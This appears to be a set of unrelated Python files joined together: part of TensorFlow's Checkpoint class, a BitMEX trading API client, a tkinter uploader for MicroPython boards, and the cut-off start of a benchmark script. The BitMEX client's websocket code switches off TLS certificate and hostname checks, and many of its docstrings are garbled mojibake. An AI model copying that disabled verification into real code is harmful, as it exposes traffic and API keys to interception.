root: The root object to checkpoint. `root` may be a trackable object or
`WeakRef` of a trackable object.
**kwargs: Keyword arguments are set as attributes of this object, and are
saved with the checkpoint. All `kwargs` must be trackable objects, or a
nested structure of trackable objects (`list`, `dict`, or `tuple`).
Raises:
ValueError: If `root` or the objects in `kwargs` are not trackable. A
`ValueError` is also raised if the `root` object tracks different
objects from the ones listed in attributes in kwargs (e.g.
`root.child = A` and `tf.train.Checkpoint(root, child=B)` are
incompatible).
"""
super(Checkpoint, self).__init__()
global _END_TIME_OF_LAST_WRITE
with _END_TIME_OF_LAST_WRITE_LOCK:
if _END_TIME_OF_LAST_WRITE is None:
_END_TIME_OF_LAST_WRITE = time.time()
attached_dependencies = None
self._save_counter = None # Created lazily for restore-on-create.
self._save_assign_op = None
if root:
trackable_root = root() if isinstance(root, weakref.ref) else root
_assert_trackable(trackable_root, "root")
attached_dependencies = []
# All keyword arguments (including root itself) are set as children
# of root.
kwargs["root"] = root
trackable_root._maybe_initialize_trackable()
self._save_counter = data_structures.NoDependency(
trackable_root._lookup_dependency("save_counter"))
for k, v in sorted(kwargs.items(), key=lambda item: item[0]):
setattr(self, k, v)
# Call getattr instead of directly using v because setattr converts
# v to a Trackable data structure when v is a list/dict/tuple.
converted_v = getattr(self, k)
if isinstance(converted_v, weakref.ref):
converted_v = converted_v()
_assert_trackable(converted_v, k)
if root:
# Make sure that root doesn't already have dependencies with these names
child = trackable_root._lookup_dependency(k)
if child is None:
attached_dependencies.append(
base.WeakTrackableReference(k, converted_v))
elif child != converted_v:
raise ValueError(
f"Cannot create a Checkpoint with keyword argument {k} if "
f"root.{k} already exists.")
self._saver = TrackableSaver(
graph_view_lib.ObjectGraphView(
root if root else self,
attached_dependencies=attached_dependencies))
self._attached_dependencies = data_structures.NoDependency(
attached_dependencies)
def _maybe_create_save_counter(self):
"""Create a save counter if it does not yet exist."""
if self._save_counter is None:
# Initialized to 0 and incremented before saving.
with ops.device("/cpu:0"):
# add_variable creates a dependency named "save_counter"; NoDependency
# prevents creating a second dependency named "_save_counter".
self._save_counter = data_structures.NoDependency(
add_variable(
self,
name="save_counter",
initializer=0,
dtype=dtypes.int64,
trainable=False))
if self._attached_dependencies is not None:
self._attached_dependencies.append(
# Store a strong reference to the `save_counter`, so that if the
# `Checkpoint` object is deleted, the `save_counter` does not get
# deleted immediately. (The LoadStatus object needs to indirectly
# reference the counter through the ObjectGraphView).
base.TrackableReference("save_counter", self._save_counter))
# When loading a checkpoint, the save counter is created after
# the checkpoint has been loaded, so it must be handled in a deferred
# manner.
if isinstance(self.root, weakref.ref):
root = self.root()
else:
root = self.root
restore = root._deferred_dependencies.pop("save_counter", ()) # pylint: disable=protected-access
if restore:
restore[0].restore(self._save_counter)
def write(self, file_prefix, options=None):
"""Writes a training checkpoint.
The checkpoint includes variables created by this object and any
trackable objects it depends on at the time `Checkpoint.write()` is
called.
`write` does not number checkpoints, increment `save_counter`, or update the
metadata used by `tf.train.latest_checkpoint`. It is primarily intended for
use by higher level checkpoint management utilities. `save` provides a very
basic implementation of these features.
Checkpoints written with `write` must be read with `read`.
Example usage:
```
step = tf.Variable(0, name="step")
checkpoint = tf.train.Checkpoint(step=step)
checkpoint.write("/tmp/ckpt")
# Later, read the checkpoint with read()
checkpoint.read("/tmp/ckpt")
# You can also pass options to write() and read(). For example this
# runs the IO ops on the localhost:
options = tf.train.CheckpointOptions(experimental_io_device="/job:localhost")
checkpoint.write("/tmp/ckpt", options=options)
# Later, read the checkpoint with read()
checkpoint.read("/tmp/ckpt", options=options)
```
Args:
file_prefix: A prefix to use for the checkpoint filenames
(/path/to/directory/and_a_prefix).
options: Optional `tf.train.CheckpointOptions` object.
Returns:
The full path to the checkpoint (i.e. `file_prefix`).
"""
if isinstance(file_prefix, os.PathLike):
file_prefix = os.fspath(file_prefix)
return self._write(file_prefix, options)
def _write(self, file_prefix, options=None, update_ckpt_state=False):
"""Internal method that implements Checkpoint.write().
Args:
file_prefix: A prefix to use for the checkpoint filenames
(/path/to/directory/and_a_prefix).
options: Optional `tf.train.CheckpointOptions` object.
update_ckpt_state: Optional bool flag. Indicates whether the internal
checkpoint state needs to be updated.
Returns:
The full path to the checkpoint (i.e. `file_prefix`).
"""
# TODO(chienchunh): Figure out the better way to measure e2e checkpoint
# duration and checkpoint size for async checkpoint.
start_time = time.time()
options = options or checkpoint_options.CheckpointOptions()
output = self._saver.save(
file_prefix=file_prefix,
options=options,
update_ckpt_state=update_ckpt_state)
end_time = time.time()
metrics.AddCheckpointWriteDuration(
api_label=_CHECKPOINT_V2,
microseconds=_get_duration_microseconds(start_time, end_time))
global _END_TIME_OF_LAST_WRITE
with _END_TIME_OF_LAST_WRITE_LOCK:
metrics.AddTrainingTimeSaved(
api_label=_CHECKPOINT_V2,
microseconds=_get_duration_microseconds(_END_TIME_OF_LAST_WRITE,
end_time))
_END_TIME_OF_LAST_WRITE = end_time
# Convert the file path from tensor to string.
output = _convert_file_name_tensor_to_string(output)
# Async checkpoint may not have finished yet, so we can't measure its
# checkpoint size now.
if not options.experimental_enable_async_checkpoint:
metrics.RecordCheckpointSize(
api_label=_CHECKPOINT_V2, filesize=_get_checkpoint_size(output))
return output
@property
def save_counter(self):
"""An integer variable which starts at zero and is incremented on save.
Used to number checkpoints.
Returns:
The save counter variable.
"""
self._maybe_create_save_counter()
return self._save_counter
def save(self, file_prefix, options=None):
# pylint:disable=line-too-long
"""Saves a training checkpoint and provides basic checkpoint management.
The saved checkpoint includes variables created by this object and any
trackable objects it depends on at the time `Checkpoint.save()` is
called.
`save` is a basic convenience wrapper around the `write` method,
sequentially numbering checkpoints using `save_counter` and updating the
metadata used by `tf.train.latest_checkpoint`. More advanced checkpoint
management, for example garbage collection and custom numbering, may be
provided by other utilities which also wrap `write` and `read`.
(`tf.train.CheckpointManager` for example).
```
step = tf.Variable(0, name="step")
checkpoint = tf.train.Checkpoint(step=step)
checkpoint.save("/tmp/ckpt")
# Later, read the checkpoint with restore()
checkpoint.restore("/tmp/ckpt-1")
# You can also pass options to save() and restore(). For example this
# runs the IO ops on the localhost:
options = tf.train.CheckpointOptions(experimental_io_device="/job:localhost")
checkpoint.save("/tmp/ckpt", options=options)
# Later, read the checkpoint with restore()
checkpoint.restore("/tmp/ckpt-1", options=options)
```
Args:
file_prefix: A prefix to use for the checkpoint filenames
(/path/to/directory/and_a_prefix). Names are generated based on this
prefix and `Checkpoint.save_counter`.
options: Optional `tf.train.CheckpointOptions` object.
Returns:
The full path to the checkpoint.
"""
if isinstance(file_prefix, os.PathLike):
file_prefix = os.fspath(file_prefix)
# pylint:enable=line-too-long
options = options or checkpoint_options.CheckpointOptions()
graph_building = not context.executing_eagerly()
if graph_building:
# Assert that async checkpoint is not used for non-eager mode.
if options.experimental_enable_async_checkpoint:
raise NotImplementedError(
"Async checkpoint is not supported for non-eager mode. ")
if ops.inside_function():
raise NotImplementedError(
"Calling tf.train.Checkpoint.save() from a function is not "
"supported, as save() modifies saving metadata in ways not "
"supported by TensorFlow Operations. Consider using "
"tf.train.Checkpoint.write(), a lower-level API which does not "
"update metadata. tf.train.latest_checkpoint and related APIs will "
"not see this checkpoint.")
session = get_session()
if self._save_counter is None:
# When graph building, if this is a new save counter variable then it
# needs to be initialized before assign_add. This is only an issue if
# restore() has not been called first.
session.run(self.save_counter.initializer)
if not graph_building or self._save_assign_op is None:
with ops.colocate_with(self.save_counter):
assign_op = self.save_counter.assign_add(1, read_value=True)
if graph_building:
self._save_assign_op = data_structures.NoDependency(assign_op)
if graph_building:
checkpoint_number = session.run(self._save_assign_op)
else:
checkpoint_number = assign_op.numpy()
file_path = self._write(
"%s-%d" % (file_prefix, checkpoint_number),
options=options,
update_ckpt_state=True)
# Update internal checkpoint state.
if not options.experimental_enable_async_checkpoint:
# For synchronous checkpoints, since the SaveOp may be run in graph/session
# mode, checkpoint state can only be updated once SaveOp is finished by
# TrackableSaver.save().
#
# If async-checkpoint is enabled, since currently only eager mode is
# supported, we can update the checkpoint state in the background as soon
# as the eager SaveOp finishes.
# See TrackableSaver._save_cached_when_graph_building() for more details.
_update_checkpoint_state_internal(file_path)
# Ensure save operations have completed, but only when running eagerly with
# a non-async checkpoint configuration.
if not graph_building and not options.experimental_enable_async_checkpoint:
context.async_wait()
return file_path
def read(self, save_path, options=None):
"""Reads a training checkpoint written with `write`.
Reads this `Checkpoint` and any objects it depends on.
This method is just like `restore()` but does not expect the `save_counter`
variable in the checkpoint. It only restores the objects that the checkpoint
already depends on.
The method is primarily intended for use by higher level checkpoint
management utilities that use `write()` instead of `save()` and have their
own mechanisms to number and track checkpoints.
Example usage:
```python
# Create a checkpoint with write()
ckpt = tf.train.Checkpoint(v=tf.Variable(1.))
path = ckpt.write('/tmp/my_checkpoint')
# Later, load the checkpoint with read()
# (With restore(), assert_consumed() would have failed.)
ckpt.read(path).assert_consumed()
# You can also pass options to read(). For example this
# runs the IO ops on the localhost:
options = tf.train.CheckpointOptions(
experimental_io_device="/job:localhost")
ckpt.read(path, options=options)
```
Args:
save_path: The path to the checkpoint as returned by `write`.
options: Optional `tf.train.CheckpointOptions` object.
Returns:
A load status object, which can be used to make assertions about the
status of a checkpoint restoration. See `restore` for details.
"""
start_time = time.time()
if isinstance(save_path, os.PathLike):
save_path = os.fspath(save_path)
options = options or checkpoint_options.CheckpointOptions()
result = self._saver.restore(save_path=save_path, options=options)
metrics.AddCheckpointReadDuration(
api_label=_CHECKPOINT_V2,
microseconds=_get_duration_microseconds(start_time, time.time()))
return result
def restore(self, save_path, options=None):
"""Restores a training checkpoint.
Restores this `Checkpoint` and any objects it depends on.
This method is intended to be used to load checkpoints created by `save()`.
For checkpoints created by `write()` use the `read()` method which does not
expect the `save_counter` variable added by `save()`.
`restore()` either assigns values immediately if variables to restore have
been created already, or defers restoration until the variables are
created. Dependencies added after this call will be matched if they have a
corresponding object in the checkpoint (the restore request will queue in
any trackable object waiting for the expected dependency to be added).
```python
checkpoint = tf.train.Checkpoint( ... )
checkpoint.restore(path)
# You can additionally pass options to restore():
options = tf.train.CheckpointOptions(experimental_io_device="/job:localhost")
checkpoint.restore(path, options=options)
```
To ensure that loading is complete and no more deferred restorations will
take place, use the `assert_consumed()` method of the status object returned
by `restore()`:
```python
checkpoint.restore(path, options=options).assert_consumed()
```
The assert will raise an error if any Python objects in the dependency graph
were not found in the checkpoint, or if any checkpointed values do not have
a matching Python object.
Name-based `tf.compat.v1.train.Saver` checkpoints from TensorFlow 1.x can be
loaded using this method. Names are used to match variables. Re-encode
name-based checkpoints using `tf.train.Checkpoint.save` as soon as possible.
**Loading from SavedModel checkpoints**
To load values from a SavedModel, just pass the SavedModel directory
to checkpoint.restore:
```python
model = tf.keras.Model(...)
tf.saved_model.save(model, path) # or model.save(path, save_format='tf')
checkpoint = tf.train.Checkpoint(model)
checkpoint.restore(path).expect_partial()
```
This example calls `expect_partial()` on the loaded status, since
SavedModels saved from Keras often generate extra keys in the checkpoint.
Otherwise, the program prints a lot of warnings about unused keys at exit
time.
Args:
save_path: The path to the checkpoint, as returned by `save` or
`tf.train.latest_checkpoint`. If the checkpoint was written by the
name-based `tf.compat.v1.train.Saver`, names are used to match
variables. This path may also be a SavedModel directory.
options: Optional `tf.train.CheckpointOptions` object.
Returns:
A load status object, which can be used to make assertions about the
status of a checkpoint restoration.
The returned status object has the following methods:
* `assert_consumed()`:
Raises an exception if any variables are unmatched: either
checkpointed values which don't have a matching Python object or
Python objects in the dependency graph with no values in the
checkpoint. This method returns the status object, and so may be
chained with other assertions.
* `assert_existing_objects_matched()`:
Raises an exception if any existing Python objects in the dependency
graph are unmatched. Unlike `assert_consumed`, this assertion will
pass if values in the checkpoint have no corresponding Python
objects. For example a `tf.keras.Layer` object which has not yet been
built, and so has not created any variables, will pass this assertion
but fail `assert_consumed`. Useful when loading part of a larger
checkpoint into a new Python program, e.g. a training checkpoint with
a `tf.compat.v1.train.Optimizer` was saved but only the state required
for inference is being loaded. This method returns the status object, and
so may be chained with other assertions.
* `assert_nontrivial_match()`: Asserts that something aside from the root
object was matched. This is a very weak assertion, but is useful for
sanity checking in library code where objects may exist in the
checkpoint which haven't been created in Python and some Python
objects may not have a checkpointed value.
* `expect_partial()`: Silence warnings about incomplete checkpoint
restores. Warnings are otherwise printed for unused parts of the
checkpoint file or object when the `Checkpoint` object is deleted
(often at program shutdown).
Raises:
NotFoundError: If a checkpoint or SavedModel cannot be found at
`save_path`.
"""
orig_save_path = save_path
if isinstance(save_path, os.PathLike):
save_path = os.fspath(save_path)
if save_path is not None and gfile.IsDirectory(save_path) and (
(gfile.Exists(utils_impl.get_saved_model_pb_path(save_path)) or
gfile.Exists(utils_impl.get_saved_model_pbtxt_path(save_path)))):
save_path = utils_impl.get_variables_path(save_path)
try:
status = self.read(save_path, options=options)
if context.executing_eagerly():
context.async_wait() # Ensure restore operations have completed.
except errors_impl.NotFoundError as e:
raise errors_impl.NotFoundError(
None, None,
f"Error when restoring from checkpoint or SavedModel at "
f"{orig_save_path}: {e.message}"
f"\nPlease double-check that the path is correct. You may be missing "
"the checkpoint suffix (e.g. the '-1' in 'path/to/ckpt-1').")
# Create the save counter now so it gets initialized with other variables
# when graph building. Creating it earlier would lead to errors when using,
# say, train.Saver() to save the model before initializing it.
self._maybe_create_save_counter()
if isinstance(status, NameBasedSaverStatus):
status.add_to_optionally_restored(self.save_counter)
return status
vnbitmex.py
# encoding: UTF-8
from __future__ import print_function
import hashlib
import json
import ssl
import traceback
from copy import copy
from threading import Thread, Event, Timer, current_thread
from queue import Queue, Empty
from multiprocessing.dummy import Pool
from time import time, sleep
from datetime import datetime, timedelta
from functools import partial
# blockReq below relies on Future and HTTPError, which the original file never
# imported; the stdlib Future and requests' HTTPError are assumed equivalents.
from concurrent.futures import Future
from requests.exceptions import HTTPError
import requests
import websocket
import pandas as pd
from six.moves.urllib.parse import urlparse, urlencode
from six.moves import input
from vnpy.api.bitmex.utils import hmac_new
REST_HOST = 'https://www.bitmex.com/api/v1'
WEBSOCKET_HOST = 'wss://www.bitmex.com/realtime'
TESTNET_REST_HOST = "https://testnet.bitmex.com/api/v1"
TESTNET_WEBSOCKET_HOST = "wss://testnet.bitmex.com/realtime"
########################################################################
class BitmexRestApi(object):
"""REST API"""
#----------------------------------------------------------------------
def __init__(self, testnet=False):
"""Constructor"""
self.apiKey = ''
self.apiSecret = ''
self.testnet = testnet
self.active = False
self.reqid = 0
self.queue = Queue()
self.pool = None
        self.sessionDict = {}  # per-worker requests.Session objects
self.header = {
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'application/json'
}
#----------------------------------------------------------------------
def init(self, apiKey, apiSecret):
"""ๅๅงๅ"""
self.apiKey = apiKey
self.apiSecret = apiSecret
#----------------------------------------------------------------------
def start(self, n=3):
"""ๅฏๅจ"""
if self.active:
return
self.active = True
self.pool = Pool(n)
self.pool.map_async(self.run, range(n))
#----------------------------------------------------------------------
def close(self):
"""ๅ
ณ้ญ"""
self.active = False
if self.pool:
self.pool.close()
self.pool.join()
#----------------------------------------------------------------------
def addReq(self, method, path, callback, on_error=None, params=None, postdict=None):
"""ๆทปๅ ่ฏทๆฑ"""
self.reqid += 1
req = (method, path, callback, on_error, params, postdict, self.reqid)
self.queue.put(req)
return self.reqid
@staticmethod
def _set_fut_result(fut, rep, exception=None):
try:
if exception:
fut.set_exception(exception)
else:
fut.set_result(rep)
except Exception as e:
fut.set_exception(e)
def blockReq(self, method, path, params=None, postdict=None, timeout=60):
def on_rep(fut, data, reqid):
self._set_fut_result(fut, data)
def on_error(fut, code, data, reqid):
e = HTTPError()
e.code = code
e.reason = data
self._set_fut_result(fut, None, exception=e)
fut = Future()
self.addReq(
method, path,
partial(on_rep, fut), on_error=partial(on_error, fut),
params=params, postdict=postdict)
rep = fut.result(timeout=timeout) # default timeout 60 seconds.
return rep
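    # Usage sketch (hypothetical arguments, mirroring the __main__ test below):
    # blocks the calling thread until a pooled worker finishes the request or
    # `timeout` expires, then returns the decoded JSON reply.
    #
    #   rep = api.blockReq('GET', '/instrument', params={'symbol': 'XBTUSD'})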
#----------------------------------------------------------------------
def processReq(self, req, i):
"""ๅค็่ฏทๆฑ"""
method, path, callback, on_error, params, postdict, reqid = req
url = (TESTNET_REST_HOST if self.testnet else REST_HOST) + path
expires = int(time() + 5)
rq = requests.Request(url=url, data=postdict)
p = rq.prepare()
header = copy(self.header)
header['api-expires'] = str(expires)
header['api-key'] = self.apiKey
header['api-signature'] = self.generateSignature(method, path, expires, params, body=p.body)
        # Use a keep-alive session; roughly 80% faster than opening a new connection per request
session = self.sessionDict[i]
resp = session.request(method, url, headers=header, params=params, data=postdict)
#resp = requests.request(method, url, headers=header, params=params, data=postdict)
code = resp.status_code
d = resp.json()
print(code, d)
if code == 200:
callback(d, reqid)
else:
if on_error:
on_error(code, d, reqid)
else:
self.onError(code, d, reqid)
#----------------------------------------------------------------------
def run(self, i):
"""่ฟ็ปญ่ฟ่ก"""
self.sessionDict[i] = requests.Session()
while self.active:
try:
req = self.queue.get(timeout=1)
self.processReq(req, i)
except Empty:
pass
#----------------------------------------------------------------------
def generateSignature(self, method, path, expires, params=None, body=None):
"""็ๆ็ญพๅ"""
# ๅฏนparamsๅจHTTPๆฅๆ่ทฏๅพไธญ๏ผไปฅ่ฏทๆฑๅญๆฎตๆนๅผๅบๅๅ
if params:
query = urlencode(sorted(params.items()))
path = path + '?' + query
if body is None:
body = ''
msg = method + '/api/v1' + path + str(expires) + body
signature = hmac_new(self.apiSecret, msg,
digestmod=hashlib.sha256).hexdigest()
return signature
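    # Worked example (hypothetical values): for GET /position?symbol=XBTUSD
    # with expires=1518064236 and an empty body, the message that gets
    # HMAC-SHA256'd with the API secret is
    #   'GET/api/v1/position?symbol=XBTUSD1518064236'
    # i.e. verb + '/api/v1' + path(+query) + expires + body, per the code above.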
#----------------------------------------------------------------------
def onError(self, code, error, reqid):
"""้่ฏฏๅ่ฐ"""
print('on error')
print(code, error)
#----------------------------------------------------------------------
def onData(self, data, reqid):
"""้็จๅ่ฐ"""
print('on data')
print(data, reqid)
    def restKline(self, symbol, type_, size, since=None):
params = {"symbol":symbol,"binSize":type_,"count":size,"reverse":True}
url = REST_HOST + "/" + "trade/bucketed"
data = requests.get(url, headers=self.header, params = params,timeout=10)
# print(data.json())
        text = data.json()  # parse the JSON response instead of eval()-ing raw text
# df = pd.DataFrame(text, columns=["datetime", "open", "high", "low", "close", "volume","%s_volume"%symbol])
df = pd.DataFrame(text, columns=["timestamp","symbol", "open", "high", "low", "close", "trades","volume","vwap","lastSize","turnover","homeNotional","foreignNotional"])
df["datetime"] = df["timestamp"].map(
lambda x: x.replace('-','').replace('T',' ').replace('.000Z',''))
delta = timedelta(hours=8)
df["datetime"] = df["datetime"].map(
            lambda x: datetime.strptime(x,"%Y%m%d %H:%M:%S")+delta) # shift if the server is in a different timezone
df["open"] = df["open"].map(
lambda x: float(x))
df["high"] = df["high"].map(
lambda x: float(x))
df["low"] = df["low"].map(
lambda x: float(x))
df["close"] = df["close"].map(
lambda x: float(x))
df["volume"] = df["volume"].map(
lambda x: float(x))
df.sort_values(by = ['datetime'], ascending=True, inplace=True)
print(df['datetime'],df['open'])
print(df.to_dict())
return df.to_dict()
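    # Usage sketch (hypothetical arguments; '1m' is one of BitMEX's binSize
    # values):
    #   bars = rest.restKline('XBTUSD', '1m', 100)  # last 100 one-minute bars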
########################################################################
class BitmexWebsocketApi(object):
"""Websocket API"""
#----------------------------------------------------------------------
def __init__(self, testnet=False):
"""Constructor"""
self.ws = None
self.thread = None
self.active = False
self.testnet = testnet
def get_host(self):
return TESTNET_WEBSOCKET_HOST if self.testnet else WEBSOCKET_HOST
#----------------------------------------------------------------------
def start(self):
"""ๅฏๅจ"""
self.ws = websocket.create_connection(self.get_host(),
sslopt={'cert_reqs': ssl.CERT_NONE})
self.active = True
self.thread = Thread(target=self.run)
self.thread.start()
self.onConnect()
#----------------------------------------------------------------------
def reconnect(self):
"""้่ฟ"""
self.ws = websocket.create_connection(self.get_host(),
sslopt={'cert_reqs': ssl.CERT_NONE})
self.onConnect()
#----------------------------------------------------------------------
def run(self):
"""่ฟ่ก"""
while self.active:
try:
stream = self.ws.recv()
data = json.loads(stream)
self.onData(data)
except:
msg = traceback.format_exc()
self.onError(msg)
self.reconnect()
#----------------------------------------------------------------------
def close(self):
"""ๅ
ณ้ญ"""
self.active = False
if self.thread:
self.thread.join()
#----------------------------------------------------------------------
def onConnect(self):
"""่ฟๆฅๅ่ฐ"""
print('connected')
#----------------------------------------------------------------------
def onData(self, data):
"""ๆฐๆฎๅ่ฐ"""
print('-' * 30)
        for k in sorted(data.keys()):  # dict.keys() has no .sort() in Python 3; sort a copy
            print(k, data[k])
#----------------------------------------------------------------------
def onError(self, msg):
"""้่ฏฏๅ่ฐ"""
print(msg)
#----------------------------------------------------------------------
def sendReq(self, req):
"""ๅๅบ่ฏทๆฑ"""
self.ws.send(json.dumps(req))
class BitmexWebsocketApiWithHeartbeat(object):
HEARTBEAT_INTERVAL = 5
HEARTBEAT_TIMEOUT = 10
RECONNECT_TIMEOUT = 5
def __init__(self, testnet=False):
"""Constructor"""
self.ws = None
self.wsThread = None
self.active = False
self.testnet = testnet
self.heartbeatCount = 0
self.heartbeatCheckCount = 0
self.heartbeatThread = None
self.heartbeatReceived = True
self.connectEvent = Event()
self.reconnecting = False
self.reconnectTimer = None
def get_host(self):
return TESTNET_WEBSOCKET_HOST if self.testnet else WEBSOCKET_HOST
def start(self, trace=False):
"""่ฟๆฅ"""
websocket.enableTrace(trace)
self.initWebsocket()
self.active = True
self.heartbeatReceived = True
def initWebsocket(self):
""""""
self.ws = websocket.WebSocketApp(self.get_host(),
on_message=self.onMessageCallback,
on_error=self.onErrorCallback,
on_close=self.onCloseCallback,
on_open=self.onOpenCallback,
)
self.wsThread = Thread(target=self.ws.run_forever, kwargs=dict(
sslopt = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False},
))
self.wsThread.start()
def doHeartbeat(self):
d = "ping"
self.ws.send(d)
def heartbeat(self):
while self.active:
self.connectEvent.wait()
self.heartbeatCount += 1
self.heartbeatCheckCount += 1
if self.heartbeatCount >= self.HEARTBEAT_INTERVAL:
self.heartbeatCount = 0
try:
self.doHeartbeat()
except:
msg = traceback.format_exc()
self.onError(msg)
self.reconnect()
if self.heartbeatCheckCount >= self.HEARTBEAT_TIMEOUT:
self.heartbeatCheckCount = 0
if not self.heartbeatReceived:
self.reconnect()
else:
self.heartbeatReceived = False
sleep(1)
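    # Watchdog timing sketch: with the defaults above, the loop ticks once per
    # second, sends a "ping" roughly every HEARTBEAT_INTERVAL (5s), and forces
    # a reconnect if no message (data or "pong") arrived within a full
    # HEARTBEAT_TIMEOUT (10s) window; onMessageCallback resets the flag.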
def reconnect(self):
"""้ๆฐ่ฟๆฅ"""
if not self.reconnecting:
self.reconnecting = True
            self.closeWebsocket()  # first close the previous connection
            # print('API disconnected, reconnecting')
self.reconnectTimer = Timer(self.RECONNECT_TIMEOUT, self.connectEvent.set)
            self.connectEvent.clear()  # mark as not connected
self.initWebsocket()
self.reconnectTimer.start()
self.heartbeatReceived = True # avoid too frequent reconnect
self.reconnecting = False
def closeHeartbeat(self):
"""ๅ
ณ้ญๆฅๅฃ"""
if self.heartbeatThread and self.heartbeatThread.isAlive():
self.active = False
self.heartbeatThread.join()
self.heartbeatThread = None
def closeWebsocket(self):
"""ๅ
ณ้ญWS"""
if self.wsThread and self.wsThread.isAlive():
self.ws.close()
if current_thread() != self.wsThread:
self.wsThread.join(2)
def close(self):
""""""
self.closeHeartbeat()
self.closeWebsocket()
def readData(self, evt):
"""่งฃ็ ๆจ้ๆถๅฐ็ๆฐๆฎ"""
data = json.loads(evt)
return data
def onMessageCallback(self, ws, evt):
""""""
self.heartbeatReceived = True
if evt != "pong":
data = self.readData(evt)
self.onData(data)
#----------------------------------------------------------------------
def onErrorCallback(self, ws, evt):
""""""
if isinstance(evt, Exception):
msg = traceback.format_exc()
else:
msg = str(evt)
self.onError(msg)
#----------------------------------------------------------------------
def onCloseCallback(self, ws):
""""""
self.onClose()
#----------------------------------------------------------------------
def onOpenCallback(self, ws):
""""""
        self.connectEvent.set()  # mark as connected
if self.reconnectTimer:
self.reconnectTimer.cancel()
self.heartbeatReceived = True
if not self.heartbeatThread:
self.heartbeatThread = Thread(target=self.heartbeat)
self.heartbeatThread.start()
self.onConnect()
def onData(self, data):
"""ไฟกๆฏๆจ้"""
print('onData')
def onError(self, data):
"""้่ฏฏๆจ้"""
print('onError')
def onClose(self):
"""ๆฅๅฃๆญๅผ"""
print('onClose')
def onConnect(self):
"""ๆฅๅฃๆๅผ"""
print('onConnect')
def sendReq(self, req):
"""ๅๅบ่ฏทๆฑ"""
self.ws.send(json.dumps(req))
if __name__ == '__main__':
API_KEY = ''
API_SECRET = ''
    ## REST test
rest = BitmexRestApi()
rest.init(API_KEY, API_SECRET)
rest.start(3)
data = {
'symbol': 'XBTUSD'
}
rest.addReq('POST', '/position/isolate', rest.onData, postdict=data)
#rest.addReq('GET', '/instrument', rest.onData)
    # WEBSOCKET test
#ws = BitmexWebsocketApi()
#ws.start()
#req = {"op": "subscribe", "args": ['order', 'trade', 'position', 'margin']}
#ws.sendReq(req)
#expires = int(time())
#method = 'GET'
#path = '/realtime'
#msg = method + path + str(expires)
#signature = hmac_new(API_SECRET, msg, digestmod=hashlib.sha256).hexdigest()
#req = {
#'op': 'authKey',
#'args': [API_KEY, expires, signature]
#}
#ws.sendReq(req)
#req = {"op": "subscribe", "args": ['order', 'execution', 'position', 'margin']}
#req = {"op": "subscribe", "args": ['instrument']}
#ws.sendReq(req)
input()
|
put_files.py
|
from tkinter import *
from tkinter import ttk
from tkinter import filedialog
from distutils import dir_util
from data.loading import Loading
# from data import mpy_cross
import os
import sys  # needed for the sys.platform checks below; missing from the original imports
import ampy.pyboard
import threading
import shutil
import mpy_cross
class PutFiles(Toplevel):
def __init__(self, parent, mpy=False):
super(PutFiles, self).__init__()
self.parent = parent
self.transient(self.parent)
self.mpy = mpy
width = 200
height = 100
pos_x = self.parent.winfo_x() + (self.parent.winfo_width() // 2) - (width // 2)
pos_y = self.parent.winfo_y() + (self.parent.winfo_height() // 2) - (height // 2)
self.geometry(f"{width}x{height}+{pos_x}+{pos_y}")
self.resizable(False, False)
self.title("Put..." if not self.mpy else "Put MPY...")
if sys.platform == "win32":
self.iconbitmap("data/AmpyGUI_icon.ico")
elif sys.platform == "linux":
self.icon = Image("photo", file="data/AmpyGUI_icon.png")
self.tk.call("wm", "iconphoto", self._w, self.icon)
ttk.Button(self, text="Put folder", takefocus=0, command=self.folder).pack(expand=YES, fill=BOTH, padx=5, pady=4)
ttk.Button(self, text="Put files", takefocus=0, command=self.files).pack(expand=YES, fill=BOTH, padx=5, pady=4)
self.focus_set()
self.grab_set()
@staticmethod
def convert_to_mpy():
for root, dirs, files in os.walk("MPY"):
root = root.replace("\\", "/")
for file in files:
if ".py" == file[-3:] and file != "main.py":
py_path = root + "/" + file
mpy_cross.run(py_path).wait()
os.remove(py_path)
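    # E.g. (hypothetical tree) "MPY/lib/util.py" is compiled in place to
    # "MPY/lib/util.mpy" and the original .py removed; "main.py" is skipped,
    # presumably so the board's auto-run entry point stays a plain .py file.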
def folder(self):
def folder_thread():
try:
if self.mpy:
# Compile python files to mpy.
if os.path.exists("MPY"):
shutil.rmtree("MPY")
dir_util._path_created = {}
dir_util.copy_tree(folder, "MPY")
self.convert_to_mpy()
directories = list()
for root, dirs, files in os.walk(folder if not self.mpy else "MPY"):
relative_path = root.replace(folder if not self.mpy else "MPY", "").replace("\\", "/")
# Directories with '.' are ignored.
if "." in relative_path:
continue
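                    # get_path() is assumed to return a trailing-slash remote
                    # path, so path[:-1] drops the slash before appending the
                    # relative sub-path.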
if relative_path != "" and path[:-1] + relative_path not in directories:
self.parent.files.mkdir(path[:-1] + relative_path, exists_okay=True)
directories.append(path[:-1] + relative_path)
for file in files:
with open(root + "/" + file, "rb") as data:
self.parent.files.put(path[:-1] + relative_path + "/" + file, data.read())
if self.mpy:
shutil.rmtree("MPY")
self.parent.refresh()
except (Exception, ampy.pyboard.PyboardError) as e:
self.parent.show_error(e)
loading.close()
path = self.parent.get_path()
folder = filedialog.askdirectory()
if folder != "":
loading = Loading(self.parent, title="Uploading")
threading.Thread(target=folder_thread).start()
self.destroy()
def files(self):
def files_thread():
try:
if self.mpy:
# Compile python files to mpy.
if os.path.exists("MPY"):
shutil.rmtree("MPY")
os.mkdir("MPY")
for file in files:
shutil.copy2(file.name, "MPY/" + file.name.split("/")[-1])
self.convert_to_mpy()
for file in os.listdir("MPY"):
with open("MPY/" + file, "rb") as data:
self.parent.files.put(path + file, data.read())
else:
for file in files:
with open(file.name, "rb") as data:
self.parent.files.put(path + file.name.split("/")[-1], data.read())
if self.mpy:
shutil.rmtree("MPY")
self.parent.refresh()
except (Exception, ampy.pyboard.PyboardError) as e:
self.parent.show_error(e)
loading.close()
path = self.parent.get_path()
files = filedialog.askopenfiles()
if files != "":
loading = Loading(self.parent, title="Uploading")
threading.Thread(target=files_thread).start()
self.destroy()
|
benchmarker.py
|
from setup.linux.installer import Installer
from setup.linux import setup_util
from benchmark import framework_test
from benchmark.test_types import *
from utils import header
from utils import gather_tests
from utils import gather_frameworks
import os
import json
import subprocess
import traceback
import time
import pprint
import csv
import sys
import logging
import socket
import threading
import textwrap
from pprint import pprint
from multiprocessing import Process
from datetime import datetime
# Cross-platform colored text
from colorama import Fore, Back, Style
# Text-based progress indicators
import progressbar
class Benchmarker:
##########################################################################################
# Public methods
##########################################################################################
############################################################
# Prints all the available tests
############################################################
def run_list_tests(self):
all_tests = self.__gather_tests
